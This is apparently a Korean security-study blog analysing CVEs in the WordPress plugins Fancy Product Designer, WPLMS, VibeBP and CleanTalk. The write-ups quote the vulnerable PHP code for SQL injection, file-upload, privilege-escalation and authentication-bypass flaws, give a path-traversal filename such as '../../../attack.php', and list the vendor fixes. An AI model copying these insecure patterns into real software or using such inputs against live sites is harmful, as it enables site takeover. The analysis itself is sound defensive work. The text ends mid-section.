꼰머의 보안공부

1. Fancy Product Designer

- 온라인에서 의류, 머그컵, 휴대폰 케이스 등을 사용자 맞춤형으로 디자인할 수 있게 해주는 Worpress 플러그인 [2]

2. 취약점

2.1 CVE-2024-51818 [3]

- 취약점은 class-wc-dokan.php의 get_products_sql_attrs() 함수에 존재
> 해당 함수는 class-product.php의 get_products()에 의해 호출
> Line13 : $attrs를 매개변수로 fpd_get_products_sql_attrs() 호출

- get_products_sql_attrs()
> Line23 : fpd_filter_users_select 값이 존재하고, -1이 아닌 경우 if문 실행
> Line24 : "user_id=" 문자열 뒤 strip_tags($_POST['fpd_filter_users_select'])를 추가한 결과를 $where 변수에 할당

- strip_tags()는 NULL bytes와 HTML 및 PHP 태그를 제거하는 함수로 SQL 공격을 방지하지 못함 [4]
> Line29~31 : $where 값은 get_products()의 $wpdb->get_results로 쿼리에 실행

inc/api/class-product.php, function get_products()
1     public static function get_products( $attrs = array(), $type = 'catalog' ) {
2     
3     global $wpdb;
4     
5     $defaults = array(
6     'cols' => '*',
7     'where' => '',
8     'order_by' => '',
9     'limit' => null,
10     'offset' => null
11     );
12     
13     $attrs = apply_filters( 'fpd_get_products_sql_attrs', $attrs );
14     
15     extract( array_merge( $defaults, $attrs ) );
16     
17     $products = array();
18     if( fpd_table_exists(FPD_PRODUCTS_TABLE) ) {
19     
20     $where = empty($where) ? $wpdb->prepare( 'WHERE type="%s"', $type) : $wpdb->prepare( 'WHERE type="%s" AND ', $type ) . $where;
21     
22     if( !preg_match('/^[a-zA-Z]+\\s(ASC|DESC)$/', $order_by) )
23     $order_by = '';
24     $order_by = empty($order_by) ? '' : 'ORDER BY '. $order_by;
25     
26     $limit = empty($limit) ? '' : $wpdb->prepare( 'LIMIT %d', $limit );
27     $offset = empty($offset) ? '' : $wpdb->prepare( 'OFFSET %d', $offset );
28     
29     $products = $wpdb->get_results(
30     SELECT $cols FROM .FPD_PRODUCTS_TABLE." $where $order_by $limit $offset"
31     );
32     
33     }
34     
35     return $products;
36     
37     }

woo/class-wc-dokan.php, function get_products_sql_attrs
1     public function get_products_sql_attrs( $attrs ) {
2     
3     $where = isset( $attrs['where'] ) ? $attrs['where'] : null;
4     
5     if( self::user_is_vendor() ) {
6     
7     $user_ids = array(get_current_user_id());
8     
9     //add fpd products from user
10     $fpd_products_user_id = fpd_get_option( 'fpd_wc_dokan_user_global_products' );
11     
12     //skip if no use is set or on product builder
13     if( $fpd_products_user_id !== 'none' && !(isset( $_GET['page'] ) && $_GET['page'] === 'fpd_product_builder') )
14     array_push( $user_ids, $fpd_products_user_id );
15     
16     $user_ids = join( ",", $user_ids );
17     
18     $where = empty($where) ? "user_id IN ($user_ids)" : $where." AND user_id IN ($user_ids)";
19     
20     }
21     
22     //manage products filter
23     if( isset($_POST['fpd_filter_users_select']) && $_POST['fpd_filter_users_select'] != "-1" ) {
24     $where = "user_id=".strip_tags( $_POST['fpd_filter_users_select'] );
25     
26     
27     $attrs['where'] = $where;
28     
29     return $attrs;
30     
31     }

2.2 CVE-2024-51919 [5]

- 취약점은 class-pro-export.php의 save_remote_file() 함수와 fpd-admin-functions.php의 fpd_admin_copy_file() 함수에 존재

- save_remote_file()
> Line9 : $remote_file_url을 통해 원격 URL 값을 받아 fpd_admin_copy_file() 호출

- fpd_admin_copy_file()
> Line8 : basename($file_url)의 결과를 $filename에 할당
> Line10 ~ Line22 : 파일을 복사 또는 저장
> 파일에 대한 검사 없이 복사 또는 저장하므로 임의의 파일 업로드가 가능

pro-export/class-pro-export.php, function save_remote_file()
1     public static function save_remote_file( $remote_file_url ) {
2     
3         $unique_dir = time().bin2hex(random_bytes(16));
4         $temp_dir = FPD_ORDER_DIR . 'print_ready_files/' . $unique_dir;
5         mkdir($temp_dir);
6     
7         $local_file_path = $temp_dir;
8     
9         $filename = fpd_admin_copy_file(
10             $remote_file_url,
11             $local_file_path
12         );
13     
14         return $filename ? $unique_dir . '/' . $filename : null;
15     
16     }

admin/fpd-admin-functions.php, function fpd_admin_copy_file()
1     function fpd_admin_copy_file( $file_url, $destination_dir ) {
2     
3     if( empty( $file_url ) ) return false;
4     
5     if( !file_exists($destination_dir) )
6             wp_mkdir_p( $destination_dir );
7     
8     $filename = basename( $file_url );
9     
10     if( function_exists('copy') ) {
11     
12     return copy( $file_url, $destination_dir . '/' . $filename ) ? $filename : false;
13     
14     }
15     else {
16     
17     $content = file_get_contents( $file_url );
18     $fp = fopen( $destination_dir . '/' . $filename, 'w' );
19     $bytes = fwrite( $fp, $content );
20     fclose( $fp );
21     
22     return $bytes !== false ? $filename : false;
23     
24     }

3. 대응방안

- 취약점이 벤더사에 전달 되었으나, 최근 버전(6.4.3)까지 패치가 이루어지지 않은 상태
> 권고사항
ⓐ임의 파일 업로드 방지 : 안전한 파일 확장자만 허용하는 허용 목록(allowlist) 설정
ⓑ SQL 인젝션 대응 : 데이터베이스 쿼리의 철저한 입력 값 검증 및 적절한 이스케이프 처리
ⓒ 정기적인 보안 점검 : 플러그인 업데이트 상태 주기적 확인 및 새로운 취약점 발생 여부 모니터링
ⓓ 대안 플러그인 고려 : 개발사가 문제를 해결하지 않는 상황에서 보안이 보장된 대안 플러그인을 사용 고려

4. 참고

[1] https://patchstack.com/articles/critical-vulnerabilities-found-in-fancy-product-designer-plugin/
[2] https://fancyproductdesigner.com/
[3] https://patchstack.com/database/wordpress/plugin/fancy-product-designer/vulnerability/wordpress-fancy-product-designer-plugin-6-4-3-unauthenticated-sql-injection-vulnerability
[4] https://www.php.net/manual/en/function.strip-tags.php
[5] https://patchstack.com/database/wordpress/plugin/fancy-product-designer/vulnerability/wordpress-fancy-product-designer-plugin-6-4-3-unauthenticated-arbitrary-file-upload-vulnerability
[6] https://www.dailysecu.com/news/articleView.html?idxno=162891

1. WPLMS 플러그인 (WordPress Learning Management System)

- WordPress를 사용해 LMS를 구축할 수 있도록 돕는 플러그인

※ Learning Management System : 학습 관리 시스템, 온라인으로 학생들의 학습을 관리할 수 있게 해주는 소프트웨어

2. VibeBP (Vibe BuddyPress Plugin)

- WPLMS와 함께 사용되는 플러그인으로, 강력한 소셜 네트워킹 및 회원 관리 기능을 제공

3. 취약점

3.1 CVE-2024-56043 [2][3]

- WPLMS의 잘못된 권한 할당으로 인한 권한 상승 취약점 (CVSS: 9.8)

영향받는 버전 : WPLMS <= 1.9.9

- includes/vibe-shortcodes/ajaxcalls.php의 wplms_register_user()에 취약점 존재

> wp_ajax_nopriv_wplms_register_user()에 의해 호출되어, 사용자 등록(≒ 회원가입)을 처리하는 함수
> Line7 : 사용자 입력인 $_POST['settings'] 값을 JSON으로 디코딩하여 $settings에 할당
> Line59 ~ Line62 : $setting 객체의 id 값을 확인해 default_role인 경우 $setting 객체의 value 값을 $user_args['role']에 할당
> Line100 : wp_insert_user($user_args)를 사용해 새로운 사용자 생성

※ WordPress의 default_role은 6가지의 값을 가짐 : Super Admin, Administrator, Editor, Author, Contributor, Subscriber [4]

- 사용자 입력으로 전달된 default_role에 대한 검증 없이 user_args['role']에 할당되므로, 임의의 역할을 지정해 권한을 상승(Super Admin, Administrator)할 수 있음

includes/vibe-shortcodes/ajaxcalls.php, function wplms_register_user()
1     function wplms_register_user(){
2         if ( !isset($_POST['security']) || !wp_verify_nonce($_POST['security'],'bp_new_signup') || !isset($_POST['settings'])){
3             echo '<div class="message">'.__('Security check Failed. Contact Administrator.','wplms').'</div>';
4             die();
5         }
6         $flag = 0;
7         $settings = json_decode(stripslashes($_POST['settings']));
8         if(empty($settings)){
9             $flag = 1; 
10         }
11     ------------- CUT HERE -------------
12     
13         $user_args = $user_fields = $save_settings = array();
14     
15         if(empty($flag)){
16     
17     ------------- CUT HERE -------------
18     
19             foreach($settings as $setting){
20     
21                 if(!empty($setting->id)){
22                     $settings2[] = $setting->id;
23                     if($setting->id == 'signup_username'){
24                         $user_args['user_login'] = $setting->value;
25                     }else if($setting->id == 'signup_email'){
26                         $user_args['user_email'] = $setting->value;
27                     }else if($setting->id == 'signup_password'){
28                         $user_args['user_pass'] = $setting->value;
29                     }else{
30                         if(strpos($setting->id,'field') !== false){
31     
32                             $f = explode('_',$setting->id);
33                             $field_id = $f[1]; 
34                             if(strpos($field_id, '[')){ //checkbox
35                                 $v = str_replace('[','',$field_id);
36                                 $v = str_replace(']','',$v);
37                                 $field_id = $v;
38                                 if(is_Array($user_fields[$field_id]['value'])){
39                                     $user_fields[$field_id]['value'][] = $setting->value;
40                                 }else{
41                                     $user_fields[$field_id] = array('value'=>array($setting->value));
42                                 }
43                             }else{
44                                 if(is_numeric($field_id) && !isset($f[2])){
45                                     $user_fields[$field_id] = array('value'=>$setting->value);
46                                 }else{
47                                     if(in_array($f[2],array('day','month','year'))){
48                                         $user_fields['field_' . $field_id . '_'.$f[2]] = $setting->value;
49                                     }else{
50                                         $user_fields[$field_id]['visibility']=$setting->value;    
51                                     }
52                                 }
53                             }
54                             
55                         }else{
56                             if(isset($form_settings[$setting->id])){
57                             
58                                 $form_settings[$setting->id] = 0; // use it for empty check 
59                                 if($setting->id=='default_role'){
60                                     $save_settings[$setting->id]=$setting->value;
61                                     $user_args['role'] = $setting->value;
62                                 }
63                                 if($setting->id=='member_type'){
64                                     $save_settings[$setting->id]=$setting->value;
65                                     $member_type=$setting->value;
66                                 }
67                                 if($setting->id=='wplms_user_bp_group'){
68                                     if(in_array($setting->value,$reg_form_settings['settings']['wplms_user_bp_group']) || $reg_form_settings['settings']['wplms_user_bp_group'] === array('enable_user_select_group')){
69                                         $save_settings[$setting->id]=$setting->value;
70                                         $wplms_user_bp_group = $setting->value;
71                                     }else{
72                                         echo '<div class="message_wrap"><div class="message error">'._x('Invalid Group selection','error message when group is not valid','wplms').'<span></span></div></div>';
73                                         die();
74                                     }
75                                     
76                                 }
77                             }
78                             
79                         }
80                     }
81                 }
82             }
83             if(!in_array('wplms_user_bp_group', $settings2)){
84                 if(!empty($reg_form_settings['settings']['wplms_user_bp_group']) && is_array($reg_form_settings['settings']['wplms_user_bp_group']) && $reg_form_settings['settings']['wplms_user_bp_group'] !== array('enable_user_select_group') && count($reg_form_settings['settings']['wplms_user_bp_group'])==1){
85                     $wplms_user_bp_group = $reg_form_settings['settings']['wplms_user_bp_group'][0];
86                 }
87             }
88         }
89     
90     ------------- CUT HERE -------------
91     
92         /*
93         FORM SETTINGS
94         */
95         if(empty($form_settings['hide_username'])){
96             $user_args['user_login'] = $user_args['user_email'];
97         }
98         $user_id = 0;
99         if(empty($form_settings['skip_mail'])){
100             $user_id = wp_insert_user($user_args);
101     
102     ------------- CUT HERE -------------

3.2 CVE-2024-56048 [5][6]

- WPLMS의 권한 검증 누락으로 인한 권한 확대 취약점

영향받는 버전 : WPLMS <= 1.9.9

- include/vibe-customtypes/includes/musettings.php의 update_license_key()에 취약점 존재
> Line2 ~ Line5 : 해당 요청이 WordPress 내에서 생성된 유효한 요청인지 확인
> Line6 ~ Line9 : $_POST['addon'] 및 $_POST['key'] 값이 비어있지 않은지 확인
> Line10 : $_POST['addon'] 및 $_POST['key'] 값을 사용해 옵션 값 업데이트

- 각 값에 대한 검증이 누락되어, 권한을 확대할 수 있음
> wp_verify_nonce()에 사용되는 nonce 값은 인증된 사용자의 경우 누구나 검증 우회 가능
> $_POST['addon'] 및 $_POST['key'] 값이 비어있는지만 검증 하므로 임의의 값을 전달할 수 있음
> $_POST['addon'] 및 $_POST['key'] 값을 사용해 원하는 만큼 검증 없이 옵션 값 업데이트 가능

includes/vibe-customtypes/includes/musettings.php, function update_license_key()
1     function update_license_key(){
2     if ( !isset($_POST['security']) || !wp_verify_nonce($_POST['security'],'security')){
3     _e('Security check Failed. Contact Administrator.','wplms');
4     die();
5     }
6     if(empty($_POST['addon']) || empty($_POST['key'])){
7     _e('Unable to update key.','wplms');
8     die();
9     }
10     update_option($_POST['addon'],$_POST['key']);
11     echo apply_filters('wplms_addon_license_key_updated',__('Key Updated.','wplms'));
12     die();
13     }

3.3 CVE-2024-56040 [7][8]

- VibeBP의 잘못된 권한 할당으로 인한 권한 상승 취약점 (CVSS: 9.8)

영향받는 버전 : VibeBP <= 1.9.9.4.1

- includes/class.ajax.php의 vibebp_register_user()에 취약점 존재
> wp_ajax_nopriv_wplms_register_user()에 의해 호출되어, 사용자 등록(≒ 회원가입)을 처리하는 함수
> Line7 : 사용자 입력인 $_POST['settings'] 값을 JSON으로 디코딩하여 $settings에 할당
> Line60 ~ Line63 : $setting 객체의 id 값을 확인해 default_role인 경우 $setting 객체의 value 값을 $user_args['role']에 할당
> Line138 : wp_insert_user($user_args)를 사용해 새로운 사용자 생성

- 사용자 입력으로 전달된 default_role에 대한 검증 없이 user_args['role']에 할당되므로, 임의의 역할을 지정해 권한을 상승(Super Admin, Administrator)할 수 있음

includes/class.ajax.php, function vibebp_register_user()
1     function vibebp_register_user(){
2         if ( !isset($_POST['security']) || !wp_verify_nonce($_POST['security'],'bp_new_signup') || !isset($_POST['settings'])){
3             echo '<div class="message">'.__('Security check Failed. Contact Administrator.','wplms').'</div>';
4             die();
5         }
6         $flag = 0;
7         $settings = json_decode(stripslashes($_POST['settings']));
8         if(empty($settings)){
9             $flag = 1; 
10         }
11     
12     ------------- CUT HERE -------------
13     
14         $user_args = $user_fields = $save_settings = array();
15     
16         if(empty($flag)){
17     
18     ------------- CUT HERE -------------
19     
20             foreach($settings as $setting){
21     
22                 if(!empty($setting->id)){
23                     $settings2[] = $setting->id;
24                     if($setting->id == 'signup_username'){
25                         $user_args['user_login'] = $setting->value;
26                     }else if($setting->id == 'signup_email'){
27                         $user_args['user_email'] = $setting->value;
28                     }else if($setting->id == 'signup_password'){
29                         $user_args['user_pass'] = $setting->value;
30                     }else{
31                         if(strpos($setting->id,'field') !== false){
32     
33                             $f = explode('_',$setting->id);
34                             $field_id = $f[1]; 
35                             if(strpos($field_id, '[')){ //checkbox
36                                 $v = str_replace('[','',$field_id);
37                                 $v = str_replace(']','',$v);
38                                 $field_id = $v;
39                                 if(is_Array($user_fields[$field_id]['value'])){
40                                     $user_fields[$field_id]['value'][] = $setting->value;
41                                 }else{
42                                     $user_fields[$field_id] = array('value'=>array($setting->value));
43                                 }
44                             }else{
45                                 if(is_numeric($field_id) && !isset($f[2])){
46                                     $user_fields[$field_id] = array('value'=>$setting->value);
47                                 }else{
48                                     if(in_array($f[2],array('day','month','year'))){
49                                         $user_fields['field_' . $field_id . '_'.$f[2]] = $setting->value;
50                                     }else{
51                                         $user_fields[$field_id]['visibility']=$setting->value;    
52                                     }
53                                 }
54                             }
55                             
56                         }else{
57                             if(isset($form_settings[$setting->id])){
58                             
59                                 $form_settings[$setting->id] = 0; // use it for empty check 
60                                 if($setting->id=='default_role'){
61                                     $save_settings[$setting->id]=$setting->value;
62                                     $user_args['role'] = $setting->value;
63                                 }
64                                 if($setting->id=='member_type'){
65                                     $save_settings[$setting->id]=$setting->value;
66                                     $member_type=$setting->value;
67                                 }
68                                 if($setting->id=='vibebp_user_bp_group'){
69                                     if(in_array($setting->value,$reg_form_settings['settings']['vibebp_user_bp_group']) || $reg_form_settings['settings']['vibebp_user_bp_group'] === array('enable_user_select_group')){
70                                         $save_settings[$setting->id]=$setting->value;
71                                         $vibebp_user_bp_group = $setting->value;
72                                     }else{
73                                         echo '<div class="message_wrap"><div class="message error">'._x('Invalid Group selection','error message when group is not valid','wplms').'<span></span></div></div>';
74                                         die();
75                                     }
76                                     
77                                 }
78                             }
79                             
80                         }
81                     }
82                 }
83             }
84             if(!in_array('vibebp_user_bp_group', $settings2)){
85                 if(!empty($reg_form_settings['settings']['vibebp_user_bp_group']) && is_array($reg_form_settings['settings']['vibebp_user_bp_group']) && $reg_form_settings['settings']['vibebp_user_bp_group'] !== array('enable_user_select_group') && count($reg_form_settings['settings']['vibebp_user_bp_group'])==1){
86                     $vibebp_user_bp_group = $reg_form_settings['settings']['vibebp_user_bp_group'][0];
87                 }
88             }
89         }
90     
91     
92     
93         $user_args = apply_filters('vibebp_register_user_args',$user_args);
94         
95     
96         //hook for validations externally
97         do_action('vibebp_custom_registration_form_validations',$name,$settings,$all_form_settings,$user_args);
98         do_action('wplms_custom_registration_form_validations',$name,$settings,$all_form_settings,$user_args);
99     
100         /*
101         RUN CONDITIONAL CHECKS
102         */
103         $check_filter = filter_var($user_args['user_email'], FILTER_VALIDATE_EMAIL); // PHP 5.3
104         if(empty($user_args['user_email']) || empty($user_args['user_pass']) || empty($check_filter)){
105             echo '<div class="message_wrap"><div class="message error">'._x('Invalid Email/Password !','error message when registration form is empty','wplms').'<span></span></div></div>';
106             die();
107         }
108     
109         //Check if user exists
110         if(!isset($user_args['user_email']) || email_exists($user_args['user_email'])){
111             echo '<div class="message_wrap"><div class="message error">'._x('Email already registered.','error message','wplms').'<span></span></div></div>';
112             die();
113         }
114     
115         //Check if user exists
116         if(!isset($user_args['user_login'])){
117     
118             $user_args['user_login'] = $user_args['user_email'];
119             if(email_exists($user_args['user_login'])){
120                 echo '<div class="message_wrap"><div class="message error">'._x('Username already registered.','error message','wplms').'<span></span></div></div>';
121                 die();
122             }
123         }elseif (username_exists($user_args['user_login'])){
124             echo '<div class="message_wrap"><div class="message error">'._x('Username already registered.','error message','wplms').'<span></span></div></div>';
125             die();
126         }
127         
128     ------------- CUT HERE -------------
129     
130         /*
131         FORM SETTINGS
132         */
133         if(empty($form_settings['hide_username'])){
134             $user_args['user_login'] = $user_args['user_email'];
135         }
136         $user_id = 0;
137         if(empty($form_settings['skip_mail'])){
138             $user_id = wp_insert_user($user_args);
139     
140     ------------- CUT HERE -------------

4. 대응방안

- 벤더사 제공 업데이트 적용 [9][10]
> WPLMS Plugin 1.9.9.5.3
> Vibebp 1.9.9.7.7

> 사용자가 등록할 수 있는 역할을 제한하는 패치 적용
> 추가 권한 검사를 구현하고 업데이트할 수 있는 옵션 이름에 대한 허용 목록 검사 적용

5. 참고

[1] https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wplms-and-vibebp-plugins/
[2] https://nvd.nist.gov/vuln/detail/CVE-2024-56043
[3] https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-unauthenticated-privilege-escalation-vulnerability
[4] https://developer.wordpress.org/plugins/users/roles-and-capabilities/
[5] https://nvd.nist.gov/vuln/detail/CVE-2024-56048
[6] https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-arbitrary-option-update-to-privilege-escalation-vulnerability
[7] https://nvd.nist.gov/vuln/detail/CVE-2024-56040
[8] https://patchstack.com/database/wordpress/plugin/vibebp/vulnerability/wordpress-vibebp-plugin-1-9-9-4-1-unauthenticated-privilege-escalation-vulnerability
[9] https://wplms.io/support/knowledge-base/vibebp-1-9-9-7-7-wplms-plugin-1-9-9-5-2/
[10] https://asec.ahnlab.com/ko/85311/

1. WPLMS 플러그인 (WordPress Learning Management System)

- WordPress를 사용해 LMS를 구축할 수 있도록 돕는 플러그인

※ Learning Management System : 학습 관리 시스템, 온라인으로 학생들의 학습을 관리할 수 있게 해주는 소프트웨어

2. 취약점

2.1 CVE-2024-56046 [2][3]

- WPLMS에서 발생하는 파일 업로드 취약점 (CVSS: 10.0)

영향받는 버전 : WPLMS <= 1.9.9

- includes/vibe-shortcodes/shortcodes.php의 wplms_form_uploader_plupload()에 취약점 존재
> Line9 : $_REQUEST["name"] 값을 우선적으로 $fileName에 할당하며, 해당 값이 없을 경우 $_FILES["file"]["name"] 값을 사용
> Line17 : $fileName은 파일 저장 경로를 결정하는데 사용됨

- name 파라미터는 사용자 요청으로부터 추출 (Line9)
> 해당 값에 대한 검증 없이 사용하여 악의적인 파일(Ex. "../../../attack.php")을 사용해 파일을 업로드할 수 있음

- $fileName을 기반으로 서버의 특정 경로에 저장
> 해당 값에 대한 검증이 없어 임의 디렉터리에 악의적인 파일을 업로드할 수 있음

includes/vibe-shortcodes/shortcodes.php, function wplms_form_uploader_plupload()
1     function wplms_form_uploader_plupload(){
2       check_ajax_referer('wplms_form_uploader_plupload');
3     
4       if (empty($_FILES) || $_FILES['file']['error']) {
5           die('{"OK": 0, "info": "Failed to move uploaded file."}');
6       }
7       $chunk = isset($_REQUEST["chunk"]) ? intval($_REQUEST["chunk"]) : 0;
8       $chunks = isset($_REQUEST["chunks"]) ? intval($_REQUEST["chunks"]) : 0;
9       $fileName = isset($_REQUEST["name"]) ? $_REQUEST["name"] : $_FILES["file"]["name"];
10     
11       $upload_dir_base = wp_upload_dir();
12       $folderPath = $upload_dir_base['basedir']."/wplms_form_uploader";
13       if(function_exists('is_dir') && !is_dir($folderPath)){
14           if(function_exists('mkdir')) 
15               mkdir($folderPath, 0755, true) || chmod($folderPath, 0755);
16       }
17       $filePath = $folderPath."/$fileName";
18     
19       // Open temp file
20       if($chunk == 0) 
21           $perm = "wb" ;
22       else 
23           $perm = "ab";
24     
25       $out = @fopen("{$filePath}.part",$perm );
26     
27       if ($out) {
28         // Read binary input stream and append it to temp file
29         $in = @fopen($_FILES['file']['tmp_name'], "rb");
30         
31         if ($in) {
32           while ($buff = fread($in, 4096))
33             fwrite($out, $buff);
34         } else
35           die('{"OK": 0, "info": "Failed to open input stream."}');
36         
37         @fclose($in);
38         @fclose($out);
39         
40         @unlink($_FILES['file']['tmp_name']);
41       } else
42         die('{"OK": 0, "info": "Failed to open output stream."}');
43     
44       // Check if file has been uploaded
45       if (!$chunks || $chunk == $chunks - 1) {
46         // Strip the temp .part suffix off
47           rename("{$filePath}.part", $filePath);
48           
49       }
50       die('{"OK": 1, "info": "Upload successful."}');
51       exit;
52     }

2.2 CVE-2024-56050 [4][5]

- WPLMS에서 발생하는 파일 업로드 취약점 (CVSS: 9.9)

영향받는 버전 : WPLMS < 1.9.9.5.3

- includes/vibe-shortcodes/upload_handler.php의 wp_ajax_zip_upload()에 취약점 존재
> Line4 ~ Line8 : 사용자 요청에서 값을 추출해 변수 할당
> Line18 ~ Line19 : Zip 파일 내 다른 파일이 있는 경우 extractZip()을 통해 파일 내 모든 내용을 추출
> 사용자 요청에서 추출한 값을 검증없이 사용하여 취약점 발생

- extractZip()
> Line6 : extractTo()를 사용해 Zip 파일내 모든 파일을 $target 디렉터리에 추출
> 파일에 대한 검증없이 추출되어 취약점 발생
> attack.php 등의 악의적 파일을 포함한 Zip 파일을 업로드할 수 있는 문제 발생

includes/vibe-shortcodes/upload_handler.php, function wp_ajax_zip_upload()
1     function wp_ajax_zip_upload(){
2     $arr = array();
3     
4     $file = $_FILES['uploadedfile']['tmp_name'];
5     $dir = explode(".",$_FILES['uploadedfile']['name']);
6     $dir[0] = str_replace(" ","_",$dir[0]);
7     $target = $this->getUploadsPath().$dir[0];
8     $index = count($dir) -1;
9     
10     if (!isset($dir[$index]) || $dir[$index] != "zip")
11     $arr[0] = __('The Upload file must be zip archive','wplms');
12     else{
13     while(file_exists($target)){
14     $r = rand(1,10);
15     $target .= $r;
16     $dir[0] .= $r;
17     }
18     if (!empty($file))
19     $arr = $this->extractZip($file,$target,$dir[0]);
20     else
21     $arr[0] = __('File too big','wplms');
22     }
23     echo json_encode($arr);
24     die();
25     }

includes/vibe-shortcodes/upload_handler.php, function extractZip()
1     function extractZip($fileName,$target,$dir){
2     $arr = array();
3     $zip = new ZipArchive;
4     $res = $zip->open($fileName);
5     if ($res === TRUE) {
6     $zip->extractTo($target);
7     $zip->close();
8     $file = $this->getFile($target);
9     ;
10     if($file){
11     $arr[0] = 'uploaded'; 
12     $arr[1] = $this->getUploadsUrl().$dir."/".$file; 
13     $arr[2] = $dir;
14     $arr[3] =$file;
15     $arr[4] = $this->getUploadsPath().$dir; 
16     }else{
17     $arr[0] = __('Please upload zip file, Index.html file not found in package','wplms').$target.print_r($file);
18     $this->rrmdir($target);
19     }
20     }else{
21     $arr[0] = __('Upload failed !','wplms');;
22     }
23     return  $arr;
24     }

2.3 CVE-2024-56052 [6][7]

- WPLMS에서 발생하는 파일 업로드 취약점 (CVSS: 9.9)

영향받는 버전 : WPLMS < 1.9.9.5.3

- includes/assignments/assignments.php의 wplms_assignment_plupload()에 취약점 존재
> Line2 ~ Line4 : WordPress 내에서 생성된 요청인지와 로그인 유무를 검증
> Line18 : $user_id 및 $assignment_id를 기반으로 $folderPath 생성

- $assignment_id에 대한 유효성 검증이 없어 임의 디렉터리에 악의적인 파일을 업로드할 수 있음

includes/assignments/assignments.php, function wplms_assignment_plupload()
1     function wplms_assignment_plupload(){
2       check_ajax_referer('wplms_assignment_plupload');
3       if(!is_user_logged_in())
4           die('user not logged in');
5     
6       $user_id = get_current_user_id();
7       
8       if (empty($_FILES) || $_FILES['file']['error']) {
9         die('{"OK": 0, "info": "Failed to move uploaded file."}');
10       }
11     
12       $chunk = isset($_REQUEST["chunk"]) ? intval($_REQUEST["chunk"]) : 0;
13       $chunks = isset($_REQUEST["chunks"]) ? intval($_REQUEST["chunks"]) : 0;
14       $fileName = isset($_REQUEST["name"]) ? $_REQUEST["name"] : $_FILES["file"]["name"];
15       
16       $upload_dir_base = wp_upload_dir();
17       $assignment_id = $_POST['assignment_id'];
18       $folderPath = $upload_dir_base['basedir']."/wplms_assignments_folder/".$user_id.'/'.$assignment_id;
19       if(function_exists('is_dir') && !is_dir($folderPath)){
20           if(function_exists('mkdir')) 
21               mkdir($folderPath, 0755, true) || chmod($folderPath, 0755);
22       }
23     
24     
25       $filePath = $folderPath."/$fileName";
26         /*if(function_exists('file_exists') && file_exists($filePath)){
27           echo __(' Chunks upload error ','wplms'). $fileName.__(' already exists.Please rename your file and try again ','wplms');
28           die();
29         }*/
30       // Open temp file
31       if($chunk == 0) $perm = "wb" ;
32       else $perm = "ab";
33     
34       $out = @fopen("{$filePath}.part",$perm );
35     
36       if ($out) {
37         // Read binary input stream and append it to temp file
38         $in = @fopen($_FILES['file']['tmp_name'], "rb");
39         
40         if ($in) {
41           while ($buff = fread($in, 4096))
42             fwrite($out, $buff);
43         } else
44           die('{"OK": 0, "info": "Failed to open input stream."}');
45         
46         @fclose($in);
47         @fclose($out);
48         
49         @unlink($_FILES['file']['tmp_name']);
50       } else
51         die('{"OK": 0, "info": "Failed to open output stream."}');
52         
53         
54       // Check if file has been uploaded
55       if (!$chunks || $chunk == $chunks - 1) {
56         // Strip the temp .part suffix off
57           rename("{$filePath}.part", $filePath);
58           
59       }
60       die('{"OK": 1, "info": "Upload successful."}');
61       exit;
62     }

3. 대응방안

- 벤더사 제공 업데이트 적용 [8][9]
> WPLMS Plugin 1.9.9.5.3

> 파일 이름과 유형을 확인하여 업로드할 수 있는 파일을 제한하는 패치 적용
> 영향을 받는 기능에 대한 추가 권한 확인을 구현하거나 영향을 받는 코드 제거

4. 참고

[1] https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wplms-and-vibebp-plugins/
[2] https://nvd.nist.gov/vuln/detail/CVE-2024-56046
[3] https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-unauthenticated-arbitrary-file-upload-vulnerability
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-56050
[5] https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-3-subscriber-arbitrary-file-upload-vulnerability
[6] https://nvd.nist.gov/vuln/detail/CVE-2024-56052
[7] https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-student-arbitrary-file-upload-vulnerability
[8] https://wplms.io/support/knowledge-base/vibebp-1-9-9-7-7-wplms-plugin-1-9-9-5-2/
[9] https://asec.ahnlab.com/ko/85311/

1. CleanTalk 플러그인 [1]

- 워드프레스 웹사이트에서 스팸을 방지하기 위해 사용되는 플러그인
- 스팸 방지 기능을 제공하는 클라우드 기반 서비스

2. 주요내용 [2]

2.1 CVE-2024-10542

- WordPress CleanTalk 플러그인에서 발생하는 DNS 스푸핑을 통한 인증 우회 취약점 (CVSS: 9.8)
> 악용에 성공할 경우 인증되지 않은 공격자가 임의의 플러그인을 설치 및 활성화하여 원격 코드를 실행할 수 있음

영향받는 버전
- Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.43.2

- 아래 함수는 토큰을 저장된 API 비교 또는 checkWithoutToken()를 통해 토큰 없이도 작업을 수행할 수 있는지 확인

78 |  // Check Access key
79 | if (
80 |     ($token === strtolower(md5($apbct->api_key)) ||
81 |      $token === strtolower(hash('sha256', $apbct->api_key))) ||
82 |    self::checkWithoutToken()
83 | ) {
84 |     // Flag to let plugin know that Remote Call is running.
85 |     $apbct->rc_running = true;
86 |  
87 |   $action = 'action__' . $action;
88 | 
89 |   if ( method_exists(__CLASS__, $action) ) {

- checkWithoutToken()는 발신 IP가 cleantalk.org 에 속하는지 확인
> IP는 사용자 정의 매개 변수인 X-Central-Ip 및 X-Forward-By 헤더 매개 변수로 결정되므로, IP 스푸핑에 취약
> IP 확인 후 strpos()를 사용해 도메인 이름을 확인하는데, 도메인에 'cleantalk.org' 문자열이 포함된 경우 검사를 통과할 수 있어, DNS 스푸핑에 취약

34 | public static function checkWithoutToken()
35 | {
36 |    global $apbct;
37 | 
38 |    $is_noc_request = ! $apbct->key_is_ok &&
39 |        Request::get('spbc_remote_call_action') &&
40 |        in_array(Request::get('plugin_name'), array('antispam', 'anti-spam', 'apbct')) &&
41 |        strpos(Helper::ipResolve(Helper::ipGet()), 'cleantalk.org') !== false;

2.2 CVE-2024-10781

- WordPress CleanTalk 플러그인에서 ‘api_key’ 값 검증 누락으로 인해 발생하는 인증 우회 취약점 (CVSS: 8.1)
> 악용에 성공할 경우 인증되지 않은 공격자가 임의의 플러그인을 설치 및 활성화할 수 있음

영향받는 버전
